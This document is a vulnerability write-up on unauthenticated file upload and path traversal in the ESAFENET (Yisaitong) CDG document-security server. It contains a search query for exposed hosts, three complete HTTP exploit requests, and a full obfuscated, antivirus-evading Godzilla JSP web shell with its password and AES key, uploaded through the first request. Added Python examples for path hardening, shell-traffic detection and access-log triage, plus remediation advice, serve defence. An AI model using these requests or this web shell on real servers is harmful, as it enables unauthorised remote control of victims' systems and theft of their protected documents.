0x01 Product Introduction
Yisaitong Electronic Document Security Management System (abbreviated CDG) is an electronic document encryption product. It uses driver-level transparent encryption to protect documents against leakage by insiders and theft by outsiders, covering the full document life cycle. The system offers several encryption modes (transparent, active, intelligent and others) so that departments with different confidentiality requirements (core versus ordinary departments) can be given graded protection, combining technical controls with management and auditing into an overall leakage-prevention system that balances cost, efficiency and security.
0x02 Vulnerability Overview
The UploadFileFromClientServiceForClient, /CDGServer3/DecryptApplicationService2 and /CDGServer3/fileType/importFileType.do interfaces (among others) of the Yisaitong Electronic Document Security Management System allow arbitrary file upload. An unauthenticated attacker can upload a web shell through these interfaces and obtain control of the server.
0x03 Scope of impact
Global; on the order of ten thousand exposed instances.
0x04 Reproduction environment
FOFA query: app="Yisaitong-Electronic Document Security Management System"
0x05 Vulnerability Reproduction
PoC-1
POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0

<file content>

Result: the request body is the raw file content; after uploading, the file is reachable as tttT.jsp in the root directory.
PoC-2
POST /CDGServer3/DecryptApplicationService2?fileId=../../../Program+Files+(x86)/ESAFENET/CDocGuard+Server/tomcat64/webapps/CDGServer3/a.jsp HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0

<file content>

Result: fileId is used as a filesystem path, so the traversal writes the body into the CDGServer3 webapp directory. Verify with:
https://your-ip/CDGServer3/a.jsp
PoC-3
POST /CDGServer3/fileType/importFileType.do?flag=syn_user_policy HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept-Encoding: gzip, deflate
Accept: */*
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Connection: close
Content-Length: 212
Content-Type: multipart/form-data; boundary=a6c1544109e610dc4bddfc7583725f9c

--a6c1544109e610dc4bddfc7583725f9c
Content-Disposition: form-data; name="fileshare"; filename="/..\\..\\..\\..\\webapps\\ROOT\\a.jsp"

<file content>
--a6c1544109e610dc4bddfc7583725f9c--

Result: the multipart filename is used as a path, so the file lands in Tomcat's ROOT webapp. Verify by requesting a.jsp directly under the site root (https://your-ip/a.jsp).
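PoC-2 and PoC-3 succeed for the same reason: a client-supplied name (the fileId query value, the multipart filename) is joined to a server directory and written without being confined to that directory. The Python below is an added example, not taken from this write-up or from the ESAFENET product. It runs the naive join against the exact fileId and filename strings from PoC-2 and PoC-3 beside a hardened version that strips directory components, enforces an extension allow-list and re-checks containment. The upload root C:\CDGData\files and the allow-list are assumptions; the product's real directory layout is not documented here.

```python
import ntpath
from urllib.parse import unquote_plus

# Assumed: the directory the server is meant to write uploads into.  The real
# CDG directory layout is not documented in the write-up; only the target
# paths from PoC-2 and PoC-3 are taken from it.
UPLOAD_ROOT = r"C:\CDGData\files"
# Assumed allow-list of document types a document-security server would store.
ALLOWED_EXT = {".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf"}

# The two user-controlled names from the PoCs, as the server sees them after
# URL decoding (PoC-2's '+' are spaces) and multipart parsing (PoC-3).
POC2_FILEID = unquote_plus(
    "../../../Program+Files+(x86)/ESAFENET/CDocGuard+Server/tomcat64/webapps/CDGServer3/a.jsp")
POC3_FILENAME = "/..\\..\\..\\..\\webapps\\ROOT\\a.jsp"


def naive_resolve(root: str, user_name: str) -> str:
    """Vulnerable pattern: root + user-supplied name, normalised by the OS.
    '..' segments walk out of root, and a leading '/' discards root's path
    entirely (Windows path semantics via ntpath, so this runs anywhere)."""
    return ntpath.normpath(ntpath.join(root, user_name))


def is_inside(root: str, path: str) -> bool:
    """True if the normalised path stays under root (Windows semantics)."""
    root_n = ntpath.normpath(root)
    try:
        return ntpath.commonpath([root_n, ntpath.normpath(path)]) == root_n
    except ValueError:          # different drive, or absolute/relative mix
        return False


def safe_resolve(root: str, user_name: str) -> str:
    """Hardened pattern: keep only the last path component (either separator
    flavour), reject empty/dot names and NUL bytes, enforce an extension
    allow-list, then re-check containment on the final path."""
    basename = user_name.replace("\\", "/").rsplit("/", 1)[-1]
    if basename in ("", ".", "..") or "\x00" in basename:
        raise ValueError(f"rejected filename: {user_name!r}")
    ext = ntpath.splitext(basename)[1].lower()
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension not allowed: {basename!r}")
    candidate = ntpath.normpath(ntpath.join(root, basename))
    if not is_inside(root, candidate):
        raise ValueError(f"path escapes upload root: {candidate}")
    return candidate


def rejects(root: str, user_name: str) -> bool:
    """Convenience: does the hardened resolver refuse this name?"""
    try:
        safe_resolve(root, user_name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for name in (POC2_FILEID, POC3_FILENAME, "report.docx"):
        p = naive_resolve(UPLOAD_ROOT, name)
        print(f"naive: {p}  inside root: {is_inside(UPLOAD_ROOT, p)}")
        print("safe:  rejected" if rejects(UPLOAD_ROOT, name)
              else f"safe:  {safe_resolve(UPLOAD_ROOT, name)}")
```

With the assumed root, the naive join places PoC-2's body at C:\Program Files (x86)\ESAFENET\CDocGuard Server\tomcat64\webapps\CDGServer3\a.jsp, exactly the path the PoC targets, and PoC-3's at C:\webapps\ROOT\a.jsp; both are outside the upload root. The hardened resolver refuses both on the extension rule alone, and a traversal name with an allowed extension is silently confined to the root.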
Exploitation
Generate an AV-evading Godzilla web shell.
Tool: https://github.com/Tas9er/ByPassGodzilla
Upload the generated shell through PoC-1:
POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0

<%! String govsb_NQ = "c1976fc471d32d0b";
String govsb_rRDYrq62F = "Tas9er";
class govsb_yYcq09pP504Xb extends /*edusb_Yd*/ClassLoader {
public govsb_yYcq09pP504Xb(ClassLoader govsb_vLM8) {
super/*edusb_QST55l*/(govsb_vLM8);
}
public Class govsb_qvs(byte[] govsb_pHH5nFhGBGJrs) {
return super./*edusb_9lA81*/\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073/*edusb_vZLmO*/(govsb_pHH5nFhGBGJrs, 1099931-1099931, govsb_pHH5nFhGBGJrs.length);
}
}
public byte[] govsb_VA(byte[] govsb_RDLs5gMnLdx7, boolean govsb_FJ1cLOh5) {
try {
j\u0061\u0076\u0061\u0078./*edusb_yyAR3cHFdavJGU*/\u0063\u0072\u0079\u0070\u0074\u006f.Cipher govsb_Bsa1 = j\u0061\u0076\u0061\u0078.\u0063\u0072\u0079\u0070\u0074\u006f.Cipher.\u0067\u0065\u0074\u0049\u006e\u0073\u0074\u0061\u006e\u0063e/*edusb_ugUsn1*/("AES");
govsb_Bsa1.init(govsb_FJ1cLOh5?1099931/1099931:1099931/1099931+1099931/1099931,new j\u0061\u0076\u0061\u0078.\u0063\u0072\u0079\u0070\u0074\u006f.spec./*edusb_AD7*/SecretKeySpec/*edusb_qvGt5qn*/(govsb_NQ.getBytes(), "AES"));
return govsb_Bsa1.doFinal/*edusb_f5*/(govsb_RDLs5gMnLdx7);
} catch (Exception e) {
return null;
}
}
%><%
try {
byte[] govsb_tby6ZYM2tmeJCk = java.util.Base64./*edusb_Hr5K*/\u0067\u0065\u0074\u0044\u0065\u0063\u006f\u0064\u0065\u0072()./*edusb_Wty*/decode(request.getParameter(govsb_rRDYrq62F));
govsb_tby6ZYM2tmeJCk = govsb_VA(govsb_tby6ZYM2tmeJCk,false);
if (session.getAttribute/*edusb_7*/("payload") == null) {
session.setAttribute("payload", new govsb_yYcq09pP504Xb(this.\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073()./*edusb_RqwVLvZTZBVeCp3*/\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073Loader())/*edusb_V6FRLkLW*/.govsb_qvs(govsb_tby6ZYM2tmeJCk));
} else {
request.setAttribute("parameters", govsb_tby6ZYM2tmeJCk);
java.io.ByteArrayOutputStream govsb_3 = new java.io./*edusb_v9iBBl*/ByteArrayOutputStream();
Object govsb_YCJ = /*edusb_xLTC*/((Class) session.getAttribute("payload"))./*edusb_Invmf*//*edusb_8Q5Mk*/new\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065()/*edusb_lSK4DHyA*/;
govsb_YCJ.equals(govsb_3);
govsb_YCJ.equals(pageContext);
response.getWriter().write("9D0C38EF2C63233C8BB491A19883F59F".substring(1099931-1099931, 16));
govsb_YCJ.toString();
response.getWriter().write(java.util.Base64/*edusb_Qz*/.getEncoder()/*edusb_P9Bzr0TBcIv7y*/.encodeToString(govsb_VA(govsb_3.toByteArray(),true)));
response.getWriter().write("9D0C38EF2C63233C8BB491A19883F59F".substring(16));
}
} catch (Exception e) {
}
%>
Connect with the Godzilla client. The shell's parameter name (password) Tas9er, its 16-byte AES key c1976fc471d32d0b and the response marker 9D0C38EF2C63233C8BB491A19883F59F are hard-coded in the source above, so the client's password, key and AES/Base64 encoder must be set to match.
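For incident response it helps to recognise this shell's traffic. From the source above: the request parameter Tas9er carries Base64 of an AES-encrypted payload (Java's "AES" transformation defaults to AES/ECB/PKCS5Padding, so the ciphertext is always a whole number of 16-byte blocks), and every response after the initial class-loading request is the 32-character marker 9D0C38EF2C63233C8BB491A19883F59F split into a 16-character prefix and suffix around the Base64 AES output. The Python below is an added example, not part of the write-up or of ByPassGodzilla; it parses that framing from captured HTTP bodies. The sample bodies are constructed, and decryption with the key is left out so the script runs without a crypto library.

```python
import base64
import re

# Constants hard-coded in the shell source above.
SHELL_PARAM = "Tas9er"             # request parameter that carries the payload
SHELL_KEY = b"c1976fc471d32d0b"    # 16-byte AES key (AES/ECB/PKCS5Padding); needed to
                                   # decrypt the ciphertext, not used by the parsers here
SHELL_MARK = "9D0C38EF2C63233C8BB491A19883F59F"

# prefix(16 hex) + base64 + suffix(16 hex), as written by the three write() calls.
_FRAME_RE = re.compile(r"^([0-9A-F]{16})([A-Za-z0-9+/]+=*)([0-9A-F]{16})$")


def _b64_blocks(s: str):
    """Strict Base64 decode that also requires whole AES blocks; None otherwise."""
    try:
        raw = base64.b64decode(s, validate=True)
    except ValueError:             # binascii.Error is a ValueError subclass
        return None
    if not raw or len(raw) % 16:
        return None
    return raw


def parse_response(body: str):
    """Return (marker, ciphertext) when body has the shell's response framing,
    else None.  marker is the 32-hex-char constant reassembled from the
    prefix and suffix; compare it with SHELL_MARK to attribute this shell."""
    m = _FRAME_RE.match(body.strip())
    if not m:
        return None
    raw = _b64_blocks(m.group(2))
    if raw is None:
        return None
    return m.group(1) + m.group(3), raw


def looks_like_shell_request(params: dict) -> bool:
    """True if the form/query parameters carry a Base64 AES-block payload
    under the shell's parameter name.  The first request only loads the
    payload class and gets an empty response, so detect on the request too."""
    val = params.get(SHELL_PARAM)
    return bool(val) and _b64_blocks(val) is not None


def encode_request_param(ciphertext: bytes) -> str:
    """Constructed sample: the parameter value a client would send."""
    return base64.b64encode(ciphertext).decode()


def build_sample_response(ciphertext: bytes) -> str:
    """Constructed sample: what the shell writes for a given ciphertext."""
    return SHELL_MARK[:16] + base64.b64encode(ciphertext).decode() + SHELL_MARK[16:]


if __name__ == "__main__":
    body = build_sample_response(b"\x00" * 32)
    print(body)
    print(parse_response(body))
    print(looks_like_shell_request({SHELL_PARAM: encode_request_param(b"\x01" * 16)}))
```

The marker is the strongest indicator: it is constant for a given shell build and is not valid Base64 framing for anything a normal JSP page emits. A Base64 body that decodes to a length not divisible by 16 cannot be this shell's output.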
0x06 Remediation advice
The system exposes many upload endpoints. Add authentication to the affected interfaces and restrict them with security-group or firewall rules so that only trusted addresses can reach them.
The vendor has released a fixed version; upgrade to the latest release from the official site:
https://www.esafenet.com/
Because the PoCs drop files into the CDGServer3 and ROOT webapp directories, patching alone does not remove shells that were already placed; check those directories for unexpected .jsp files (a.jsp and tttT.jsp in the examples above) before considering the host clean.
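Patching does not tell you whether the endpoints were already hit. The Python below, added here and not part of the write-up, triages Tomcat access-log lines (the default %h %l %u %t "%r" %s %b pattern, assumed) for POSTs to the three endpoints, flags traversal sequences in the query string and sources outside a trusted range, and then reports later successful .jsp fetches from flagged sources. The log lines are constructed for the example and the upload token in the third line is shortened. PoC-3's traversal lives in the multipart body, which the access log does not record; it surfaces here only through the untrusted-source rule, or via full request capture.

```python
import ipaddress
import re
from urllib.parse import unquote_plus

# The three endpoints named in this write-up.
SUSPECT_PATHS = {
    "/CDGServer3/UploadFileFromClientServiceForClient",
    "/CDGServer3/DecryptApplicationService2",
    "/CDGServer3/fileType/importFileType.do",
}

# Tomcat's default AccessLogValve pattern: %h %l %u %t "%r" %s %b
_LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
_TRAVERSAL_RE = re.compile(r"\.\.[/\\]|%2e%2e", re.IGNORECASE)

# Constructed sample: 10.0.0.5 runs PoC-2 then fetches the shell; a client in
# 192.168.1.0/24 uploads normally (token shortened); an internet host runs
# PoC-3 then fetches /a.jsp from the ROOT webapp.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Sep/2023:10:01:02 +0800] "POST /CDGServer3/DecryptApplicationService2?fileId=../../../Program+Files+(x86)/ESAFENET/CDocGuard+Server/tomcat64/webapps/CDGServer3/a.jsp HTTP/1.1" 200 12
10.0.0.5 - - [02/Sep/2023:10:01:05 +0800] "GET /CDGServer3/a.jsp HTTP/1.1" 200 16
192.168.1.20 - - [02/Sep/2023:10:02:00 +0800] "POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNO HTTP/1.1" 200 0
192.168.1.20 - - [02/Sep/2023:10:02:10 +0800] "GET /CDGServer3/index.jsp HTTP/1.1" 200 5120
203.0.113.7 - - [02/Sep/2023:10:03:00 +0800] "POST /CDGServer3/fileType/importFileType.do?flag=syn_user_policy HTTP/1.1" 200 0
203.0.113.7 - - [02/Sep/2023:10:03:02 +0800] "GET /a.jsp HTTP/1.1" 200 16
"""


def _trusted(ip: str, trusted_nets) -> bool:
    """Is the source inside one of the allowed networks (CIDR strings)?"""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in ipaddress.ip_network(n, strict=False) for n in trusted_nets)


def triage(lines, trusted_nets=()):
    """Return findings in log order: flagged POSTs to the upload endpoints and,
    for sources already flagged, later successful fetches of .jsp files.
    Assumes chronological input, as Tomcat writes it."""
    findings = []
    flagged_sources = set()
    for line in lines:
        m = _LINE_RE.match(line)
        if not m:
            continue
        ip, ts, method, target, status, _size = m.groups()
        path, _, query = target.partition("?")
        if method == "POST" and path in SUSPECT_PATHS:
            reasons = []
            # Check both raw and decoded forms: '../' may arrive percent-encoded.
            if _TRAVERSAL_RE.search(query) or _TRAVERSAL_RE.search(unquote_plus(query)):
                reasons.append("traversal in query")
            if not _trusted(ip, trusted_nets):
                reasons.append("untrusted source")
            if reasons:
                flagged_sources.add(ip)
                findings.append({"ip": ip, "time": ts, "path": path, "reasons": reasons})
        elif (method == "GET" and status == "200" and path.lower().endswith(".jsp")
              and ip in flagged_sources):
            findings.append({"ip": ip, "time": ts, "path": path,
                             "reasons": ["jsp fetched after flagged upload"]})
    return findings


def triage_sample():
    """Run the triage over the constructed log with the LAN treated as trusted."""
    return triage(SAMPLE_LOG.splitlines(), trusted_nets=("192.168.1.0/24",))


if __name__ == "__main__":
    for f in triage_sample():
        print(f"{f['time']} {f['ip']} {f['path']} :: {', '.join(f['reasons'])}")
```

On the sample the legitimate client upload from 192.168.1.20 produces nothing, while the two attacker sequences each yield a flagged POST followed by the fetch of the dropped .jsp. Correlating the fetch with an earlier flagged POST from the same source keeps the noise from ordinary .jsp page views down; swap the trusted networks for the ranges your security group actually allows.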